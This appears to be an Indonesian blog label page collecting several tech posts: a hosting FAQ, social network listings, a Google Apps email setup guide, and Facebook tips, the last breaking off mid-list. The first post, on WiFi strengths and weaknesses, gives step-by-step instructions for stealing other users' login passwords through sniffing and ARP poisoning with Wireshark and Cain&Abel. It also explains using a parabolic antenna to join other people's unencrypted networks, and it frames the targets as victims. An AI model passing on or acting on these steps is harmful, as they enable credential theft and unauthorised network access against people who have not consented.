Tampilkan postingan dengan label pengetahuan teknologi. Tampilkan semua postingan
Tampilkan postingan dengan label pengetahuan teknologi. Tampilkan semua postingan

Kekurangan & Kelebihan WiFi (+ Cara Hack Jaringan WiFi)

a. Kelebihan Wi-fi

Tingginya animo masyarakat -khususnya di kalangan komunitas Internet- menggunakan teknologi Wi-Fi dikarenakan paling tidak dua faktor.
1. Kemudahan akses
Artinya, para pengguna dalam satu area dapat mengakses Internet secara bersamaan tanpa perlu direpotkan dengan kabel. 2. pengguna yang ingin melakukan surfing atau browsing berita dan informasi di Internet, cukup membawa PDA (pocket digital assistance) atau laptop berkemampuan Wi-Fi ke tempat dimana terdapat access point atau hotspot. Menjamurnya hotspot di tempat-tempat tersebut -yang dibangun oleh operator telekomunikasi, penyedia jasa Internet bahkan orang perorangan- dipicu faktor kedua, yakni karena biaya pembangunannya yang relatif murah atau hanya berkisar 300 dollar Amerika Serikat. Juga salah satu kelebihan dari Wi-Fi adalah kecepatannya yang beberapa kali lebih cepat dari modem kabel yang tercepat.

Jadi pemakai Wi-Fi tidak lagi harus berada di dalam ruang kantor untuk bekerja Wi-fi Hardware Hardware wi-fi yang ada di pasaran saat ini ada berupa Wi-fi dalam bentuk PCI Wi-fi dalam bentuk USB Ada 2 mode akses koneksi Wi-fi, yaitu Ad-Hoc Mode koneksi ini adalah mode dimana beberapa komputer terhubung secara langsung, atau lebih dikenal dengan istilah Peer-to-Peer. Keuntungannya, lebih murah dan praktis bila yang terkoneksi hanya 2 atau 3 komputer, tanpa harus membeli access point Infrastruktur Menggunakan Access Point yang berfungsi sebagai pengatur lalu lintas data, sehingga memungkinkan banyak Client dapat saling terhubung melalui jaringan (Network).
2. Kelemahan pada wifi
Mudahnya dihacking oleh para hacer untuk mencuri password pengguna wi-fi Cara adalah sebagai berikut: Pertama kita harus mengetahui perbedaan antara jaringan Hub dan Switch: * Pada jaringan hub semua data yang mengalir di jaringan dapat dilihat/diambil oleh komputer manapun yang ada di jaringan asalakan komputer tersebut merequest data tersebut, kalo tidak direquest ya tidak akan datang. * Pada jaringan switch hanya komputer yang melakukan pertukaran data yang dapat melihat data tersebut, komputer2 lain tidak berhak merequest data tersebut.
Masalahnya adalah harga dari router hub dan switch tidak berbeda jauh sehingga kebanyakan tempat sekarang sudah menggunakan metode switch yang menyulitkan untuk network hacking. Hacking ini menggunakan teknik: * Sniffing * ARP Poison Routing.
Kedua Teknik di atas tidak akan bisa dicegah oleh firewall apapun di komputer korban, dijamin. Important
Note: ARP Poison Routing dapat meyebabkan denial of service (dos) pada salah satu / semua komputer pada network anda
Kelebihan:
1. Tidak akan terdeteksi oleh firewall tipe dan seri apapun karena kelemahannya terletak pada sistem jaringan bukan pada komputernya
2. Bisa mencuri semua jenis login password yang melalui server HTTP
3. Bisa mencuri semua login password orang yang ada di jaringan Hub selama program diaktifkan
4. Untuk ARP Poisoning bisa digunakan untuk mencuri password di HTTPS
5. Semua programnya free
6. Untuk jaringan Switch harus di ARP poisoning 1 persatu dan bandwidth anda akan termakan banyak untuk hal itu (kalo inet super cepat ga masalah)
7. Ketahuan / tidak oleh admin jaringan di luar tanggung jawab saya
8. Mulai dari sini anggap bahwa di network dalam kisah ini ada 3 komputer, yaitu:
9. Komputer Korban
10. Komputer Hacker
11. Server
Langkah-langkah:
1. 1. Cek tipe jaringan anda, anda ada di jaringan switch / hub. Jika anda berada di jaringan hub bersyukurlah karena proses hacking anda akan jauh lebih mudah.
2. 2. Download program-program yang dibutuhkan yaitu Wireshark dan Cain&Abel.Code: http://www.wireshark.org/download.html http://www.oxid.it/cain.html
Cara Menggunakan WireShark:
1. Jalankan program wireshark
2. Tekan tombol Ctrl+k (klik capture lalu option)
3. Pastikan isi pada Interfacenya adalah Ethernet Card anda yang menuju ke jaringan, bila bukan ganti dan pastikan pula bahwa “Capture packets in promiscuous mode” on
4. Klik tombol start
5. Klik tombol stop setelah anda merasa yakin bahwa ada password yang masuk selamaanda menekan tombol start
6. Anda bisa melihat semua jenis packet yang masuk dan keluar di jaringan (atau pada komputer anda saja jika network anda menggunakan Swtich
7. Untuk menganalisis datanya klik kanan pada data yang ingin di analisis lalu klik “Follow TCP Stream” dan selamat menganalisis paketnya (saya tidak akan menjelaskan caranya karena saya tidak bisa )
8. Yang jelas dari data itu pasti di dalamnya terdapat informasi2 yang dimasukkan korban ke website dan sebaliknya.
Cara di atas hanya berlaku apabila jaringan anda adalah Hub bukan switch.
Dari cara di atas anda dapat mengetahui bahwa jaringan anda adalah hub/switch dengan melihat pada kolom IP Source dan IP Destination. Bila pada setiap baris salah satu dari keduanya merupakan ip anda maka dapat dipastikan jaringan anda adalah jaringan switch, bila tidak ya berarti sebaliknya.
Cara Menggunakan Cain&Abel:
* * Penggunaan program ini jauh lebih mudah dan simple daripada menggunakan wireshark, tetapi bila anda menginginkan semua packet yang sudah keluar dan masuk disarankan anda menggunakan program wireshark * * Buka program Cain anda
* * Klik pada bagian configure
* * Pada bagian “Sniffer” pilih ethernet card yang akan anda gunakan
* Pada bagian “HTTP Fields” anda harus menambahkan username fields dan password fields nya apabila yang anda inginkan tidak ada di daftar. Sebagai contoh saya akan beritahukan bahwa kalo anda mau hack password Friendster anda harus menambahkan di username fields dan passworsd fields kata name, untuk yang lain anda bisa mencarinya dengan menekan klik kanan view source dan anda harus mencari variabel input dari login dan password website tersebut. Yang sudah ada di defaultnya rasanyan sudah cukup lengkap, anda dapat mencuri pass yang ada di klubmentari tanpa menambah apapun.
* * Setelah itu apply settingannya dan klik ok
* * Di menu utama terdapat 8 tab, dan yang akan dibahas hanya 1 tab yaitu tab “Sniffer” karena itu pilih lah tab tersebut dan jangan pindah2 dari tab tersebut untuk mencegah kebingungan anda sendiri
* * Aktifkan Sniffer dengan cara klik tombol sniffer yang ada di atas tab2 tersebut, carilah tombol yang tulisannya “Start/Stop Sniffer”
* * Bila anda ada di jaringan hub saat ini anda sudah bisa mengetahui password yang masuk dengan cara klik tab (Kali ini tab yang ada di bawah bukan yang di tengah, yang ditengah sudah tidak usah diklik-klik lagi) “Passwords”
* Anda tinggal memilih password dari koneksi mana yang ingin anda lihat akan sudah terdaftar di sana * * Bila anda ternyata ada di jaringan switch, ini membutuhkan perjuangan lebih, anda harus mengaktifkan APR yang tombolonya ada di sebelah kanan Sniffer (Dan ini tidak dijamin berhasil karena manage dari switch jauh lebih lengkap&secure dari hub) * * Sebelum diaktifkan pada tab sniffer yang bagian bawah pilih APR
* * Akan terlihat 2 buah list yang masih kosong, klik list kosong bagian atas kemudian klik tombol “+” (Bentuknya seperti itu) yang ada di jajaran tombol sniffer APR dll
* * Akan ada 2 buah field yang berisi semua host yang ada di jaringan anda
* * Hubungkan antara alamat ip korban dan alamat ip gateway server (untuk mengetahui alamat gateway server klik start pada komp anda pilih run ketik cmd lalu ketik ipconfig pada command prompt)
* * Setelah itu baru aktifkan APR, dan semua data dari komp korban ke server dapat anda lihat dengan cara yang sama. Anda dapat menjalankan kedua program di atas secara bersamaan (Cain untuk APR dan wireshark untuk packet sniffing) bila ingin hasil yang lebih maksimal. Password yang bisa anda curi adalah password yang ada di server HTTP (server yang tidak terenkripsi), bila data tersebut ada di server yang terenkripsi maka anda harus mendekripsi data tersebut sebelum memperoleh passwordnya (dan itu akan membutuhkan langkah2 yang jauh lebih panjang dari cara hack ini) Untuk istilah-istilah yang tidak ngerti bisa dicari di wikipedia (tapi yang inggris ya kalo yang indo jg belum tentu ada).
Secara teknologis jalur frekuensi -baik 2,4 GHz maupun 5 GHz- yang menjadi wadah operasional teknologi Wi-Fi tidak bebas dari keterbatasan . Pasalnya, pengguna dalam suatu area baru dapat memanfaatkan sistem Internet nirkabel ini dengan optimal, bila semua perangkat yang dipakai pada area itu menggunakan daya pancar yang seragam dan terbatas. Apabila prasyarat tersebut tidak diindahkan, dapat dipastikan akan terjadi harmful interference bukan hanya antar perangkat pengguna Internet, tetapi juga dengan perangkat sistem telekomunikasi lainnya. Bila interferensi tersebut berlanjut -karena penggunanya ingin lebih unggul dari pengguna lainnya, maupun karenanya kurangnya pemahaman terhadap keterbatasan teknologinya- pada akhirnya akan membuat jalur frekuensi 2,4 GHz dan 5 GHz tidak dapat dimanfaatkan secara optimal.
Keterbatasan lain dari kedua jalur frekuensi nirkabel ini (khususnya 2,4 GHz) ialah karena juga digunakan untuk keperluan ISM (industrial, science and medical). Konsekuensinya, penggunaan komunikasi radio atau perangkat telekomunikasi lain yang bekerja pada pada pita frekuensi itu harus siap menerima gangguan dari perangkat ISM, sebagaimana tertuang dalam S5.150 dari Radio Regulation. Dalam rekomendasi ITU-R SM.1056, diinformasikan juga karakteristik perangkat ISM yang pada intinya bertujuan mencegah timbulnya interferensi, baik antar perangkat ISM maupun dengan perangkat telekomunikasi lainnnya.
Rekomendasi yang sama menegaskan bahwa setiap anggota ITU bebas menetapkan persyaratan administrasi dan aturan hukum yang terkait dengan keharusan pembatasan daya. Menyadari keterbatasan dan dampak yang mungkin timbul dari penggunaan kedua jalur frekuensi nirkabel tersebut, berbagai negara lalu menetapkan regulasi yang membatasi daya pancar perangkat yang digunakan. Sinyal Wireless Sinyal wireless LAN normalnya dapat ditangkap pada kisaran sekitar 200 meter dari access point, tetapi client yang menggunakan antena eksternal dapat menangkap sinyal sampai sejauh 1000 meter.
Apabila anda menempatkan AP dekat pintu atau jendela, dapat dipastikan para tetangga dapat ikut menikmati akses Internet atau melakukan sniffing terhadap traffic network. Apabila infrastruktur wireless LAN itu melibatkan koneksi wireless antar-gedung tinggi, maka client yang tidak diinginkan dapat melakukan sniffing dari bawah sejauh sampai 2.500 kaki (762 meter). Jadi walaupun sinyal wireless LAN para ISP yang dipasangkan di puncak-puncak gedung tinggi dapat di-sniffing dari bawah (dikenal sebagai war flying).
Jika anda ingin connect internet menggunakan wifi sementara anda jauh AP atau dari tempat wifi yang tersedia anda bisa mendekatkan diri dengan area tersebut dan bisa main internet sepuasnya dengan langkah sebagai berikut :
1) Anda harus memiliki USB Wireless Adapter. Yang bisa anda dapatkan ditoko toko komputer dengan harga berkisar Rp 210.000 (cukup murah untuk technology secanggih ini) + antenna UHF bentuk parabola.
2) Langkah ini merupakan langkah kunci, yaitu dengan menggunakan antenna UHV yang berbentuk Grid Parabolic sebagai Reflector untuk memperkuat sinyal.
3) Untuk lebih memperkuat daya reflexy dari parabole anda dapat menambahkan kawat kasa pada seluruh permukaan, lalujangan lupa disekrup dengan rangka parabola. Anda juga bisa menambahkan alumunium foil.
4) Pasanglah USB WiFi Adapter pada tiang penyangga yang ada di tengah parabola. Apabila terlalu panjang dari fokusnya dapat dipotong. Usahakan agar USB WiFI terletak pada fokus parabola. Ingat kan rumus fokus parabola. Kalau ragu nih rumus sederhananya. F= D(kuadrat) / 4(kuadrat).c D: diameter parabola C: kedalaman parabola
5) pasang kabel USB( High Speed 2.0 usb cable system) sedemikian rupa.
6) Lalu pasang kembali tiang penyangga USB wifi pada parabola. Pasang pada pipa besi untuk mempermudah antenne supaya enak diputar putar.
7) Kalau udah install driver USB WiFI tadi (bawaan pabrik). Lalu install “NETWORK STUMBLER” untuk mencari sinyal yang kuat dan terdekat.
Cara Mengenal Hacking Wireless/WiFi/Hotspot dan Triknya Pasang antenna diluar dan masukkan kabel USB pada port komputer anda. Scan pake Net Stumbler. Cari jaringan yang ngga’ di ENCRYPT dan jaraknya paling deket dengan anda. Lalu join aja. Akses ke wifi : jenis : secure, artinya untuk dapat mengakses kita harus memasukkan password unsecure, artinya kita bisa mengakses wifi tanpa harus mengisikan password, jd langsung konek. Yang unsecure, kadang juga tidak bisa mengakses internet walau bisa konek ke jaringan. Hal ini karena ada pengaturan IP.
Untuk server yang menggunakan ip dinamik, maka kita tidak usah pusing dengan ip, karena ip sdh otomatis dimasukkan oleh server ke klien (computer kita). Untuk server yang menggunakan static ip, maka kita harus secara manual memasukkan ip untuk computer/laptop kita.
Jika kita bisa konek ke wifi tp tidak bisa akses internet, cobalah ubah ip laptop kita. Caranya : * klik kanan icon wifi di bawah kanan layar * pilih properties * pilih Advanced * pada bagian connection pilih Internet Protocol (TCP/IP) * pilih static ip * pada ip isi : 192.168.0.212 * pada Net Mask isi : 255.255.255.0 * pada getway isi : 192.168.0.1 * pada dns server isi : 192.168.0.1 * klik ok.






Kemarin salah seorang teman saya membuat sebuah situs web (dengan konsep mirip seperti "Mari Berkomunitas Di Faceblog"), namun dia bingung dan bertanya pada saya "Kenapa situs tidak bisa dibuka, padahal sudah upload file situsnya tapi website tidak juga tampil ?".

Tampilan situs eror

Pertanyaan ini konon katanya juga menduduki peringkat atas daftar pertanyaan yang paling sering ditanyakan oleh pelanggan salah satu penyedia hosting yang cukup terkenal di Indonesia yaitu idwebhost.com, dan berikut saya cuplikkan bagaimana solusinya.

Kenapa situs tidak tampil?
  1. File tidak terupload ke direktori public_html
    Semua file website dan folder harus berada dibawah direktori public_html (atau lengkapnya/home/username/public_html). Di luar direktori tersebut file website tidak akan dapat ditampilkan. Pastikan Anda telah masuk ke direktori public_html dahulu baru mengupload file.
    Jika menggunakan FTP, pertama kali setelah software FTP Anda terkoneksi dengan server web hosting, direktorinya adalah /home/username/. Anda perlu mengklik folder public_html dahulu agar bisa masuk ke /home/username/public_html.
  2. Tidak ada file index
    Nama file yang pertama kali akan ditampilkan sebagai halaman depan haruslah index.* (index.htm, index.html, atau index.php). Tanpa file index, halaman depan website Anda tidak akan muncul.
  3. Penulisan nama file index salah
    Masih berkaitan dengan point 2 di atas, bisa jadi Anda telah mempiliki file index. Akan tetapi penamaannya salah (mengandung huruf kapital). Nama file index harus dalam huruf kecil. Contoh nama file yang benar :index.html / index.htm bukan Index.html / index.HTM
  4. Software yang digunakan untuk mendesain web tidak memenuhi syarat
    Meskipun tidak selalu terjadi, kadang – kadang apabila Anda membuat website dengan Microsoft Publisher, hasil output file html dari software tersebut tidak standard. Ukurannya cenderung membengkak, atau menggunakan tag (kode) html yang tidak standard. Hal ini menyebabkan website Anda tidak dapat tampil.
    Gunakan software yang memang diperuntukkan pembuatan website seperti Macromedia / Adobe Dreamweaver dan Microsoft Frontpage.

ponsel masa depan

Bagaimana anda membayangkan ponsel di masa depan? ada beberapa orang yang telah merancang tentang konsep ponsel in the future, ada yang desain-nya artistik, ada juga yang mendesain ponsel yang dilengkapi dengan fitur canggih, seperti bisa di bongkar pasang (seperti puzzle), layar yang bisa dilipat (ponsel origami), dan lain-lain

Teknologi ponsel memang berkembang dengan cepat, 10 tahun yang lalu mungkin anda tidak terfikir bahwa ponsel bisa Video call, MMS, Internet dan lain-lain. Begitu juga dengan masa depan, fitur yang ditawarkan sangat diluar imajinasi kita.


Berikut screenshot rancangan ponsel masa depan diambil dari situs BBC dan sumber lain





Eksis Lewat Situs Jejaring Sosial


Di era internet sekarang, hampir semua orang memiliki akun jejaring sosial. Jejaring sosial adalah situs yang memungkinkan kita membuat komunitas di dunia maya, bertukar informasi, foto, dan komentar.

Situs jejaring sosial sebenarnya telah muncul sejak 1997, di awali dengan situs www.sixdegrees.com. Situs ini memiliki aplikasi untuk membuat profil, menambah teman, dn mengirim pesan. Hingga di tahun 2002 muncul friendster, yang semula di sediakan untuk tempat pencarian jodoh. Friendster kemudian menjadi situs jejaring paling popular sampai kemunculan MySpace, Facebook, dan Twitter.

Saat ini sudah banyak sekali situs jejaring sosial yang bisa kamu pilih sesuai kebutuhan, dan fiturnya juga semakin beragam.

Berikut beberapa jejaring sosial yang bisa kamu coba :

Facebook

facebook blog info

Bisa di bilang Facebook adalah yang paling popular saat ini, dengan jumlah pengguna mencapai 500 juta orang. Pengakses situs ini bisa menjalin pertemanan, bergabung ke grup atau komunitas sosial, mengirim message, mengubah video dan foto, menulis blog, main game, dan update status.

MySpace

MySpace blog info

Fungsi MySpace tidak jauh berbeda dengan situs jejaring lain, tapi ada satu fungsi yang menonjol, yaitu sarana untuk para musisi memperkenalkan karyanya.

Twitter

twitter blog info

Ini dia situs jejaring yang sedang naik daun saat ini. Twitter lebih sederhana dibandingkan Facebook. Fungsi awalnya adalah penyebaran berita dengan cepat, tetapi saat ini banyak di gunakan sebatas update status saja.

Foursquare

foursquare blog info

Fungsi forsquare adalah update lokasi, semakin sering check in di satu lokasi, pengguna bisa mendapat posisi sebagai mayor di lokasi tersebut. Update Foursquare biasanya terhubung dengan Twitter atau Facebook.

Plurk

plurk

Fungsi utama Plurk juga untuk update status dengan tampilan time line memanjang. Keistimewaannya kita bisa memilih awalan status kita seperti ” feel “, ” say “, ” ask “,dll. Selain itu Plurk semakin banyak emoticon yang bisa di pakai.

Linkedln

linkedin

Situs ini adalah jejaring sosial berbasis bisnis dan profesional. Lewat Linkedln pengguna bisa saling bertukar ide, pengetahuan serta berbagi bursa kerja dengan jaringan profesional yang sangat besar.

Goodreads

goodreads

Situs ini cocok bagi anda yang hobi membaca. Fitur utamanya adalah tentang buku apa saja yang sudah pernah di baca oleh penggunanya.

Flixster

flixster

Fungsinya sama dengan goodreads, bedanya adalah sarana untuk sharing tentang film.

Yahoo ! Koprol

yahoo koprol

Koprol adalah jejaring sosial yang baru-baru ini ramai. Didirikan oleh orang indonesia, namun sekarang koprol di beli oleh Yahoo ! situs ini sama fungsinya dengan facebook, yang menarik dari Koprol adalah kita bisa menentukan lokasi tempat yang kita inginkan untuk update status. Dilengkapi juga dengan google maps, untuk mengetahui lokasi teman !

Cara Membuat Alamat Email Dengan Domain Sendiri


Hai sobat, kali ini saya ingin share tentang bagaimana Cara Membuat Alamat Email Dengan Domain Sendiri. Sebenarnya untuk sobat yang memiliki hosting berbayar, sobat sudah memiliki alamat Email dengan Domain yang terdaftar di hosting tersebut. Tinggal membuat dan memanfaatkannya, hanya saja terkadang email yang memanfaatkan fitur di cpanel hosting masih jauh dari security yang kuat, terkadang malah mengganggu kinerja server, karena banyaknya email spam yang masuk, apalagi sedang dapat serbuan spammer besar-besaran. Jadi, cara yang paling disarankan adalah membuat alamat email dengan domain sendiri menggunakan layanan gratis yang disediakan oleh Google, yaitu Google Apps.

01 Cara Membuat Alamat Email Dengan Domain Sendiri

01 Cara Membuat Alamat Email Dengan Domain Sendiri

Google Apps merupakan sebuah layanan yang di berikan oleh Google kepada seluruh pengguna internet untuk mendapatkan fitur Gmail, Google Documents, Google Sites, dan banyak lagi dengan domain sendiri. Hanya perlu daftar, konfigurasi dan email siap digunakan untuk semua fitur Google. Dan yang paling menarik yaitu, server dari Google hampir 100% uptime, tidak pernah down, selain itu Google Apps GRATIS.

Ada 3 jenis layanan yang diberikan oleh Google Apps, yaitu:

  1. Google Apps (individuals, groups and entrepreneurs, maksimal 50 akun email)
  2. Google Apps for Business (berbayar, $50 per user per tahun, Full Control dan Fiturnya banyak)
  3. Google Apps for Education (untuk Pendidikan)

Untuk lebih jelasnya silahkan kunjungi http://www.google.com/apps/.

Langsung saja pada tahapan pembuatan alamat email dengan domain sendiri, berikut langkah-langkahnya:

  • Buka situs Google Apps di http://www.google.com/apps/
  • Disana tertera 3 pilihan Google Apps, pilih yang pertama (Google Apps), klik “learn more
  • Selanjutnya, pada sebelah kanan situs, klik “Get Started
  • Masukan nama Domain sobat, tanpa www, misalnya: bloggernesia.co.cc, kemudian klik “Get Started
  • Pada tahapan selanjutnya, sobat diminta untuk mengisi informasi tentang diri sobat. Isikan saja semua dengan benar, yang wajib di isi adalah yang memiliki tanda bintang (*), selain itu tidak di isi tidak apa-apa dan jangan lupa memberikan tanda centang pada “I understand that if I cannot alter DNS records for my domain, I may impact my organization’s ability to use Google Apps.“, jika sudah, klik “Continue
  • Langkah selanjutnya yaitu sobat diminta untuk mengisi form tentang akun administrator yang akan memanajemen seluruh akun yang ada. Isikan dengan benar. Jika sudah, scrol kebawah, dan klik tombol “I accept. Continue with setup
  • Selamat, akun Google Apps telah berhasil dibuat. Tetapi belum bisa dipergunakan untuk fitur-fitur yang disediakan, apalagi layanan email. Sobat perlu konfirmasi kepemilikan nama domain, dan konfigurasi MX Server Address di cPanel hosting.

Selanjutnya adalah konfirmasi nama domain, agar layanan Google Apps dengan domain yang didaftarkan tadi dapat aktif dan sobat dapat memanfaatkan berbagai fitur yang diberikan. Berikut langkahnya:

  • Pilih tab “Setup“, klik “next” terus sampai muncul halaman seperti berikut:

02 Cara Membuat Alamat Email Dengan Domain Sendiri

02 Cara Membuat Alamat Email Dengan Domain Sendiri

  • Pilih metode konfirmasi kepemilikan domain yang anda inginkan. Disini saya memilih “Upload an HTML file to your server“, download file yang sudah disediakan, lalu upload file tersebut ke hosting (nomor 1), lebih tepatnya letakan di path “public_html” atau jika domain sobat adalah domain addons, maka letakkan saja di folder domain addons tersebut, yang penting kalau di akses menjadi http://domain.com/file.html. Selanjutnya coba akses file tersebut dengan klik link yang ada pada nomor 3.
  • Jika file berhasil di akses, maka langkah selanjutnya yaitu klik tombol “Verify“.
  • Selamat, dalam beberapa menit domain sobat akan aktif. Menunggu resolved saja dari system Google Apps, dan fitur yang diberikan dapat sobat pergunakan, kecuali layanan email, karena perlu konfigurasi MX Server Address di cPanel Hosting.

Baiklah, sekarang langkah terakhir, yaitu mengaktifkan fitur webmail, agar sobat bisa mengirim dan menerima email. Berikut langkah-langkahnya:

03 Cara Membuat Alamat Email Dengan Domain Sendiri

03 Cara Membuat Alamat Email Dengan Domain Sendiri

  • Pilih tab Dashboard, pada bagian bawah, sobat akan menemukan informasi seperti pada gambar diatas. Itu berarti fitur email belum di aktifkan, untuk mengaktifkan, klik “Activate email
  • Pada tahapan selanjutnya sobat diminta untuk melakukan konfigurasi MX Records (MX Entry) pada cPanel hosting.
  • Sekarang, coba kembali ke cPanel hosting, kemudian cari menu “Mail” > “MX Entry

04 Cara Membuat Alamat Email Dengan Domain Sendiri

04 Cara Membuat Alamat Email Dengan Domain Sendiri

  • Pilih nama domain yang tadi sobat daftarkan di Google Apps. Pada bagian bawah, defaultnya akan ada 1 MX Record yang tersedia, hapus MX Record tersebut.
  • Setelah itu, add MX Records baru sesuai dengan apa yang diperintahkan oleh Google Apps, berikut data yang harus sobat tambahkan:

05 Cara Membuat Alamat Email Dengan Domain Sendiri

05 Cara Membuat Alamat Email Dengan Domain Sendiri

  • Pada saat mengisi informasi, hilangkan tanda titik (.) yang terakhir pada MX Server address. Sebagai contoh, saya mengisinya begini:

06 Cara Membuat Alamat Email Dengan Domain Sendiri

06 Cara Membuat Alamat Email Dengan Domain Sendiri

  • Sampai muncul tanda centang hijau, itu baru benar, dan klik tombol “Add New Record”
  • Lakukan sampai selesai, ada 7 MX Server Address dan seharusnya menjadi seperti berikut:

07 Cara Membuat Alamat Email Dengan Domain Sendiri

07 Cara Membuat Alamat Email Dengan Domain Sendiri

  • Jika sudah, sekarang kembali ke halaman Google Apps tadi, dan klik tombol “I have completed these steps“.
  • Proses update MX Server Address, memerlukan waktu sekitar 48 jam, menurut System, tetapi kemungkinan kurang dari 24 jam saja sudah aktif, jadi tunggu saja. Jika sudah aktif, email sudah siap digunakan. Proses updating sedang berlangsung, berikut gambarnya:

08 Cara Membuat Alamat Email Dengan Domain Sendiri

08 Cara Membuat Alamat Email Dengan Domain Sendiri

Selesai sudah Cara Membuat Alamat Email Dengan Domain Sendiri. Silahkan pergunakan dengan bijaksana. Sekian, maaf jika tutornya membingungkan, selamat mencoba.

Perbedaan Website dengan Blog

Apa itu website? Apa itu blog?

Website

Blog

Di blog ini akan di jelaskan sedikit perbedaan tentang pengertian website dan blog

Situs web atau dalam bahasa inggrisnya Web Site atau singkatannya site bukan hal yang aneh di dengar, situs web atau web site adalah sebutan untuk sekelompok halaman web (web page) yang biasanya kita tulis dengan awalan World Wide Web(WWW) di internet serta di akhiri dengan nama domain (domain name) web tersebut.

Secara terminologi, website adalah kumpulan dari halaman-halaman situs, yang biasanya terangkum dalam sebuah domain atau subdomain, yang tempatnya berada di dalam World Wide Web (WWW) di Internet. Sebuah halaman web adalah dokumen yang ditulis dalam format HTML (Hyper Text Markup Language), yang hampir selalu bisa diakses melalui HTTP (Hypertext Transfer Protocol), yaitu protokol yang menyampaikan informasi dari server website untuk ditampilkan kepada para pemakai melalui web browser. Semua publikasi dari website-website tersebut dapat membentuk sebuah jaringan informasi yang sangat besar.

Halaman-halaman dari website akan bisa diakses melalui sebuah URL yang biasa disebut Homepage. URL merupakan singkatan dari Uniform Resource Locator, adalah rangkaian karakter menurut suatu format standar tertentu, yang digunakan untuk menunjukkan alamat suatu sumber – seperti dokumen dan gambar – di Internet. URL ini mengatur halaman-halaman situs untuk menjadi sebuah hirarki, meskipun, hyperlink-hyperlink yang ada di halaman tersebut mengatur para pembaca dan memberitahu mereka sususan keseluruhan dan bagaimana arus informasi ini berjalan.

Blog merupakan singkatan dari web log adalah bentuk aplikasi web yang menyerupai tulisan-tulisan (yang dimuat sebagai posting) pada sebuah halaman web umum. Tulisan-tulisan ini seringkali dimuat dalam urut terbalik (isi terbaru dahulu baru kemudian diikuti isi yang lebih lama), meskipun tidak selamanya demikian. Situs web seperti ini biasanya dapat diakses oleh semua pengguna internet sesuai dengan topik dan tujuan dari si pengguna blog tersebut.

Media blog pertama kali dipopulerkan oleh Blogger.com, yang dimiliki oleh PyraLab sebelum akhirnya PyraLab diakuisi oleh Google.Com pada akhir tahun 2002 yang lalu. Semenjak itu, banyak terdapat aplikasi-aplikasi yang bersifat sumber terbuka yang diperuntukkan kepada perkembangan para penulis blog tersebut.

Blog mempunyai fungsi yang sangat beragam,dari sebuah catatan harian, media publikasi dalam sebuah kampanye politik, sampai dengan program-program media dan perusahaan-perusahaan. Sebagian blog dipelihara oleh seorang penulis tunggal, sementara sebagian lainnya oleh beberapa penulis, . Banyak juga weblog yang memiliki fasilitas interaksi dengan para pengunjungnya, seperti menggunakan buku tamu dan kolom komentar yang dapat memperkenankan para pengunjungnya untuk meninggalkan komentar atas isi dari tulisan yang dipublikasikan.

Ngeblog (istilah bahasa Indonesia untuk blogging) harus dilakukan hampir setiap waktu untuk mengetahui eksistensi dari pemilik blog. Juga untuk mengetahui sejauh mana blog dirawat (mengganti template) atau menambah artikel. selain merawat dan terus melakukan pembaharuan di blognya, para blogger yang tergolong baru pun masih sering melakukan blogwalking, yaitu aktivitas dimana para blogger meninggalkan link di blog atau situs orang lain seraya memberikan komentar. Beberapa blogger kini bahkan telah menjadikan blognya sebagai sumber pemasukan utama. Sehingga kemudian muncullah istilah profesional blogger, atau problogger, orang yang menggantungkan hidupnya hanya dari aktivitas ngeblog.

Penyebab Di Blokir ( Banned ) id Facebook>Tutorial Facebook Up To Date


penyebab-penyebab mengapa facebook kita di blokir. Ternyata faktor penyebab dari terblokirnya facebook bisa datang dari luar (external) maupun dalam (internal). Apa saja sih penyebab facebook kita di blokir ? Penasaran ? Mau ?

Faktor external terblokirnya facebook

1. Mungkin anda pekerja atau mahasiswa, dimana peraturan di kantor/kampus itu tidak boleh membuka situs facebook.

2. Mungkin facebook anda di hack sama orang lain.

Faktor internal terblokirnya facebook

1. Terlalu sering menambah (nge-add) teman dalam satu hari. Perlu diketahui, penambahan teman di facebook itu di batasi.

2. Terlalu banyak mengirimkan/menyebarkan link secara berlebihan (spam) baik di dinding, pesan, group atau pun pada saat chatting.

3. Link atau tulisan yang anda kirim bersifat rasis, fitnah, penghinaan, pornografi, dll. contoh anda mengirimkan youporn.com

4. Terlalu banyak mencolek teman (poke).

5. Link atau tulisan yang anda kirim, di kirim secara copy paste.

6. Penggunaan nama palsu.

7. Usia anda di bawah 18 tahun.

8. Mengiklankan aplikasi facebook di dinding facebook orang lain.

9. Terlalu banyak join di group facebook.

10. Ketidaklayakan foto yang anda pakai.

Untuk sementara segitu dulu. Kalau ada yang mau menambahkan, silahkan !! ^_^

Bikin Blog di Facebook

facebookDalam Fb memang tidak ada fitur resmi untuk membuat blog. Tetapi berkat aplikasi buatan para pengguna Fb, terdapat beberapa aplikasi blog yang siap digunakan dalam pembuatan blog dalam Fb. Meski beberapa diantaranya masih dalam tahap pengembangan lebih lanjut, tapi tidak ada salahnya untuk dicoba.

Langkah 1
Dalam keadaan anda sudah logged in ke dalam account Fb anda, cobalah untuk memasukkan blog pada bagian search untuk mencari aplikasi blog yang tersedia.

Langkah 2
akan muncul beberapa aplikasi blog yang dibuat oleh pihak yang berbeda. Kali ini pilihlah yang merupakan buatan Shujaat Bin Tariq dengan ikon B berwarna biru. Klik (View Application).

Langkah 3
Selanjutnya akan muncul halaman utama aplikasi Blog tersebut. Klik [ Go to to Application ]

Langkah 4
Kemudian Anda akan mendapatkan beberapa blog yang telah dipublikasikan oleh pengguna Fb lainnya dengan aplikasi yang sama. Di halaman ini juga terdapat link untuk membuat blog pertama anda. Klik [Create New Blog Entry]

Langkah 5
Sebelum anda dapat membuat sebuah blog entry baru, anda harus mengaktifkan Face Blog. Klik [Add Face Blog].

Langkah 6
Di halaman berikutnya anda akan diminta konfirmasi untuk memberikan akses untuk tampilan profil dan segala sesuatu yang berkenaan dengan data diri anda di Facebook. Klik [Allow].

Langkah 7
Anda akan menjumpai kembali tampilan halaman yang sama dengan sebelumnya. Klik [Create New Blog Entry].

Langkah 8
Ada baiknya anda membuat kategori terlebih dahulu untuk membuat blog Anda menjahdi lebih rapi berdasarkan topik2 berbeda yang anda buat. Untuk itu klik tab [Categories] lalu [Add New Category].

Langkah 9
Pada dialog box [Add New Category], berikan nama untuk kategori tersebut pada bagian [Title]. Untuk [Description] berikan penjelasan singkat mengenai kategori tersebut, atau bisa juga anda tinggalkan dalam keadaan kosong. Klik [Add].

Langkah 10
sejurus kemudian kategori baru yang telah anda buat kini sudah tercantum di dalam blog anda.

Langkah 11
